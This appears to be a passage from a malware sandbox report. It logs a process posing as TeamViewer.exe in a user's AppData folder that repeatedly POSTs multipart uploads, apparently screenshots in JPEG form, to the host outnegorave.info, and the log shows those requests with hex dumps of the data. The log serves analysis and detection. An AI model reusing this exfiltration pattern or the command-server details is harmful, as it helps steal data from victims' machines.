                                                                                                                                    2021-09-15 11:52:23 UTC1753OUTData Raw: 40 68 aa 44 8b 4b 49 46 69 85 85 cd 19 a4 14 b4 5c 56 14 52 e6 99 4b 9a 77 0b 0f cd 2d 33 34 b9 a6 4d 87 0a 5c d3 73 45 3b 85 87 e6 8c d3 73 46 ef 6a 2e 2b 12 03 4b 9a 8f 71 f5 a3 3e f4 ee 2b 12 64 51 9a 8f 34 b9 a2 e2 b0 fc d1 9a 6e 68 cd 3b 85 87 52 e6 9b 46 68 b8 ac 3b 34 b9 a6 66 8c d3 b8 58 7e 68 cd 33 75 26 ea 2e 1c a4 99 a3 35 1e ea 37 52 b8 72 92 6e a4 dd 51 17 a6 97 a1 c8 6a 04 c5 a9 a5 ea 22 f4 d2 d5 2e 65 28 12 97 a6 17 a8 cb 53 0b 54 39 16 a0 48 5f de 98 5a 98 5a 98 5a a1 c8 d1 44 79 6a 61 6a 69 6a 61 6a cd c8 d1 44 71 34 c2 69 09 a4 a8 6c b4 85 26 92 92 8c d2 63 b0 86 8a 0d 36 a4 a4 19 a2 92 92 95 c7 62 86 3b d2 d2 51 5c a7 58 b4 51 46 28 00 a2 8a 28 10 b4 51 49 40 05 14 51 40 05 2d 25 2d 00 14 51 45 02 0a 28 a2 98 05 14 51 40 05 2d 14 50 01
                                                                                                                                    Data Ascii: @hDKIFi\VRKw-34M\sE;sFj.+Kq>+dQ4nh;RFh;4fX~h3u&.57RrnQj".e(ST9H_ZZZDyjajijajDq4il&c6b;Q\XQF((QI@Q@-%-QE(Q@-P
                                                                                                                                    2021-09-15 11:52:23 UTC1769OUTData Raw: b0 dd 36 94 c6 fa 01 ce c0 31 2a 8f a7 f1 7e 1c fb 57 41 e1 1f 03 68 66 d6 3b eb 99 7f b4 64 3d 51 97 6a 46 dd d4 a7 5c 8e e1 bf 2a 40 79 5c d1 49 04 ad 14 f1 bc 72 21 c3 23 a9 04 1f 70 69 95 d1 fc 42 44 8f c6 b7 e9 1a aa 22 88 80 55 18 00 79 49 5c e5 50 82 ad e9 b6 4d 7d 74 23 07 6a 0e 5d bd 05 54 ae 83 c2 fb 71 72 0f 5f 97 f2 e6 a6 4e cb 42 2a 54 54 d7 3b 57 b1 b9 67 a3 5b 84 d9 6d 66 24 da 39 25 37 1f c6 ab ea 1e 1c 17 0a c2 3b 56 86 61 d0 aa 11 f9 8a dd 1b ff 00 b3 6d c4 59 31 8c ef c7 f7 f3 df f0 c5 6d e9 be 6f d8 53 cf ce ec 9d bb ba ed ed fd 6b 0c 4d 29 50 c3 ac 42 96 bd 8f 46 18 ea 75 a7 ec a3 0f 74 f1 69 a2 78 26 78 a5 52 ae 84 ab 03 d8 d3 2b 6b c6 3e 5f fc 25 17 be 56 31 b9 73 8f 5d a3 3f ad 62 d6 d4 e5 cf 05 2e e8 e2 92 b3 68 28 a2 96 ac 41 49
                                                                                                                                    Data Ascii: 61*~WAhf;d=QjF\*@y\Ir!#piBD"UyI\PM}t#j]Tqr_NB*TT;Wg[mf$9%7;VamY1moSkM)PBFutix&xR+k>_%V1s]?b.h(AI
                                                                                                                                    2021-09-15 11:52:23 UTC1772OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 32 38 36 32 39 39 36 38 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------428629968--
                                                                                                                                    2021-09-15 11:52:24 UTC1772INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:24 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=f783497303501e397cd1b19a1edc3350fd11bc1acc137b9e39add4fd23c198c5; expires=Thu, 15-Sep-2022 11:52:23 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r9A7csYAhhC74oY4vXRSC7H2c4SGWRiSg5WM36RwhJbFM1V05f2VffwFRWbiXp1nzvbhFy5f0IRuNkeriFDYFRwY7AKYSaL2J8Tg%2BGIE3P232xCL%2F7OJnyEY0Q8%2BRmiId4C7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a60b88f80eaf-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:24 UTC1773INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    21192.168.2.549812172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:24 UTC1773OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84984
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------1864185560
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:24 UTC1773OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 38 36 34 31 38 35 35 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1864185560Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:24 UTC1774OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 77 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^w;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:24 UTC1774OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:24 UTC1790OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:24 UTC1806OUTData Raw: ef 13 0f ad 21 b7 71 f7 b0 3f 1a d3 97 4f be 3c b6 5b f1 aa cf 67 70 9d 62 6a da 35 13 ea 61 25 25 d0 ab e4 7a b0 a5 f2 54 75 6a 95 a2 91 7a a9 1f 85 37 69 1d 45 68 9a 33 6d 8d f2 d0 7a 9a 5c 28 fe 11 45 2d 3b 0a ec 32 3b 00 29 72 7d 69 29 68 b1 21 cf ad 28 a4 a5 a0 42 d1 45 14 80 51 4a 29 29 45 26 4b 1c 2b 46 cb 19 18 ac e1 57 ec 8f 22 b1 aa bd d3 6c 3b f7 ce b5 4e 34 d2 7f d9 af 3e bb ff 00 58 df 5a ef 73 8d 25 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36
                                                                                                                                    Data Ascii: !q?O<[gpbj5a%%zTujz7iEh3mz\(E-;2;)r}i)h!(BEQJ))E&K+FW"l;N4>XZs%5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56
                                                                                                                                    2021-09-15 11:52:24 UTC1822OUTData Raw: 5a 5a 4a 29 88 0d 28 a4 a5 14 00 a2 92 94 52 1a 62 0a 5a 4a 05 20 1c 29 c2 9b 4b 54 84 c5 a2 92 96 98 0b 45 14 50 48 b4 51 45 30 0a 28 a2 81 0e 14 b4 d1 4a 29 a0 16 96 92 96 99 21 4b 49 4a 29 80 b4 51 45 31 0b 45 25 2d 02 0a 5a 4a 5a 68 07 51 48 29 69 92 14 a2 8a 29 80 b4 50 29 69 88 4a 4a 5a 28 01 07 5a 7d 30 75 a7 d0 81 85 06 8a 29 92 02 96 90 53 b1 42 06 28 14 ea 6d 38 55 22 58 9d e9 69 0f 5a 70 a6 02 0a 75 36 94 53 13 16 8a 28 a0 40 29 69 05 3a 98 84 a7 52 51 4c 18 ea 5a 68 a5 a6 48 ec d2 8a 6d 28 a6 84 c7 0a 5a 6d 38 53 25 85 2d 25 14 c4 2d 14 94 b4 00 52 d2 52 d0 02 d2 d3 69 d4 09 85 28 a4 a5 a0 42 d1 49 4b 40 82 96 8a 29 80 52 8a 29 45 02 62 d0 29 29 45 02 34 34 91 fb f7 3e 88 6a b1 ea 7e b5 6b 49 ff 00 5d 27 fb a6 aa 9e a7 eb 59 2f 8d 84 fe 14 14
                                                                                                                                    Data Ascii: ZZJ)(RbZJ )KTEPHQE0(J)!KIJ)QE1E%-ZJZhQH)i)P)iJJZ(Z}0u)SB(m8U"XiZpu6S(@)i:RQLZhHm(Zm8S%-%-RRi(BIK@)R)Eb))E44>j~kI]'Y/
                                                                                                                                    2021-09-15 11:52:24 UTC1838OUTData Raw: 51 4d a5 06 a9 32 59 20 a2 90 1a 2a 91 22 d2 d2 51 9a 61 61 73 46 69 05 2d 17 15 85 14 b9 a6 52 e6 9d c2 c3 f3 4b 4c cd 2e 69 93 61 c2 97 34 dc d1 4e e1 61 f9 a3 34 dc d1 bb da 8b 8a c4 80 d2 e6 a3 dc 7d 68 cf bd 3b 8a c4 99 14 66 a3 cd 2e 68 b8 ac 3f 34 66 9b 9a 33 4e e1 61 d4 b9 a6 d1 9a 2e 2b 0e cd 2e 69 99 a3 34 ee 16 1f 9a 33 4c dd 49 ba 8b 87 29 26 68 cd 47 ba 8d d4 ae 1c a4 9b a9 37 54 45 e9 a5 e8 72 1a 81 31 6a 69 7a 88 bd 34 b5 4b 99 4a 04 a5 e9 85 ea 32 d4 c2 d5 0e 45 a8 12 17 f7 a6 16 a6 16 a6 16 a8 72 34 51 1e 5a 98 5a 9a 5a 98 5a b3 72 34 51 1c 4d 30 9a 42 69 2a 1b 2d 21 49 a4 a4 a3 34 98 ec 21 a2 83 4d a9 29 06 68 a4 a4 a5 71 d8 a1 8e f4 b4 94 57 29 d6 2d 14 51 8a 00 28 a2 8a 04 2d 14 52 50 01 45 14 50 01 4b 49 4b 40 05 14 51 40 82 8a 28 a6
                                                                                                                                    Data Ascii: QM2Y *"QaasFi-RKL.ia4Na4}h;f.h?4f3Na.+.i43LI)&hG7TEr1jiz4KJ2Er4QZZZZr4QM0Bi*-!I4!M)hqW)-Q(-RPEPKIK@Q@(
                                                                                                                                    2021-09-15 11:52:24 UTC1853OUTData Raw: 3e 94 cf 10 7c 38 d4 6c 37 4d a5 31 be 80 73 b0 0c 4a a3 e9 fc 5f 87 3e d5 d0 78 47 c0 da 19 b5 8e fa e6 5f ed 19 0f 54 65 da 91 b7 75 29 d7 23 b8 6f ca 90 1e 57 34 52 41 2b 45 3c 6f 1c 88 70 c8 ea 41 07 dc 1a 65 74 7f 10 91 23 f1 ad fa 46 aa 88 a2 20 15 46 00 1e 52 57 39 54 20 ab 7a 6d 93 5f 5d 08 c1 da 83 97 6f 41 55 2b a0 f0 be dc 5c 83 d7 e5 fc b9 a9 93 b2 d0 8a 95 15 35 ce d5 ec 6e 59 e8 d6 e1 36 5b 59 89 36 8e 49 4d c7 f1 aa fa 87 87 05 c2 b0 8e d5 a1 98 74 2a 84 7e 62 b7 46 ff 00 ec db 71 16 4c 63 3b f1 fd fc f7 fc 31 5b 7a 6f 9b f6 14 f3 f3 bb 27 6e ee bb 7b 7f 5a c3 13 4a 54 30 eb 10 a5 af 63 d1 86 3a 9d 69 fb 28 c3 dd 3c 5a 68 9e 09 9e 29 54 ab a1 2a c0 f6 34 ca da f1 8f 97 ff 00 09 45 ef 95 8c 6e 5c e3 d7 68 cf eb 58 b5 b5 39 73 c1 4b ba 38 a4
                                                                                                                                    Data Ascii: >|8l7M1sJ_>xG_Teu)#oW4RA+E<opAet#F FRW9T zm_]oAU+\5nY6[Y6IMt*~bFqLc;1[zo'n{ZJT0c:i(<Zh)T*4En\hX9sK8
                                                                                                                                    2021-09-15 11:52:24 UTC1856OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 38 36 34 31 38 35 35 36 30 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1864185560--
                                                                                                                                    2021-09-15 11:52:25 UTC1856INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:25 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=db21aa9251e613e9d7c0dcc96f0a9f3b709a40cd7bb6f9550393d411ba62b7d9; expires=Thu, 15-Sep-2022 11:52:24 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8m90%2FstnGYYmQS2lGhQgrvUVgeOzyfv2jOfQYjupkCqGTm%2Ftc7amCWq4774QWI0nweGW9m9byboGMM5V36gRRPkN8uaLBIUcRtn1AnSD%2FX0oS0vhqLLb7W9U6r0bNRTKY%2B7a"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a6131b9b9814-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:25 UTC1857INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    22192.168.2.549813172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:26 UTC1857OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84991
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------1379028263
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:26 UTC1858OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 33 37 39 30 32 38 32 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1379028263Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:26 UTC1858OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 7c 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^|;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:26 UTC1858OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:26 UTC1874OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:26 UTC1890OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:26 UTC1906OUTData Raw: 52 8a 43 4c 41 4b 49 40 a4 03 85 38 53 69 6a 90 98 b4 52 52 d3 01 68 a2 8a 09 16 8a 28 a6 01 45 14 50 21 c2 96 9a 29 45 34 02 d2 d2 52 d3 24 29 69 29 45 30 16 8a 28 a6 21 68 a4 a5 a0 41 4b 49 4b 4d 00 ea 29 05 2d 32 42 94 51 45 30 16 8a 05 2d 31 09 49 4b 45 00 20 eb 4f a6 0e b4 fa 10 30 a0 d1 45 32 40 52 d2 0a 76 28 40 c5 02 9d 4d a7 0a a4 4b 13 bd 2d 21 eb 4e 14 c0 41 4e a6 d2 8a 62 62 d1 45 14 08 05 2d 20 a7 53 10 94 ea 4a 29 83 1d 4b 4d 14 b4 c9 1d 9a 51 4d a5 14 d0 98 e1 4b 4d a7 0a 64 b0 a5 a4 a2 98 85 a2 92 96 80 0a 5a 4a 5a 00 5a 5a 6d 3a 81 30 a5 14 94 b4 08 5a 29 29 68 10 52 d1 45 30 0a 51 45 28 a0 4c 5a 05 25 28 a0 46 86 92 3f 7e e7 d1 0d 56 3d 4f d6 ad 69 3f eb a4 ff 00 74 d5 53 d4 fd 6b 25 f1 b0 9f c2 82 8a 28 ad 0c 82 96 92 96 81 0b 45 25 2d
                                                                                                                                    Data Ascii: RCLAKI@8SijRRh(EP!)E4R$)i)E0(!hAKIKM)-2BQE0-1IKE O0E2@Rv(@MK-!NANbbE- SJ)KMQMKMdZJZZZm:0Z))hRE0QE(LZ%(F?~V=Oi?tSk%(E%-
                                                                                                                                    2021-09-15 11:52:26 UTC1922OUTData Raw: 25 2d 50 85 14 b4 dc d2 d3 10 ec d2 d3 69 68 10 e1 4a 29 b4 a0 d5 26 4b 24 14 52 03 45 52 24 5a 5a 4a 33 4c 2c 2e 68 cd 20 a5 a2 e2 b0 a2 97 34 ca 5c d3 b8 58 7e 69 69 99 a5 cd 32 6c 38 52 e6 9b 9a 29 dc 2c 3f 34 66 9b 9a 37 7b 51 71 58 90 1a 5c d4 7b 8f ad 19 f7 a7 71 58 93 22 8c d4 79 a5 cd 17 15 87 e6 8c d3 73 46 69 dc 2c 3a 97 34 da 33 45 c5 61 d9 a5 cd 33 34 66 9d c2 c3 f3 46 69 9b a9 37 51 70 e5 24 cd 19 a8 f7 51 ba 95 c3 94 93 75 26 ea 88 bd 34 bd 0e 43 50 26 2d 4d 2f 51 17 a6 96 a9 73 29 40 94 bd 30 bd 46 5a 98 5a a1 c8 b5 02 42 fe f4 c2 d4 c2 d4 c2 d5 0e 46 8a 23 cb 53 0b 53 4b 53 0b 56 6e 46 8a 23 89 a6 13 48 4d 25 43 65 a4 29 34 94 94 66 93 1d 84 34 50 69 b5 25 20 cd 14 94 94 ae 3b 14 31 de 96 92 8a e5 3a c5 a2 8a 31 40 05 14 51 40 85 a2 8a 4a
                                                                                                                                    Data Ascii: %-PihJ)&K$RER$ZZJ3L,.h 4\X~ii2l8R),?4f7{QqX\{qX"ysFi,:43Ea34fFi7Qp$Qu&4CP&-M/Qs)@0FZZBF#SSKSVnF#HM%Ce)4f4Pi% ;1:1@Q@J
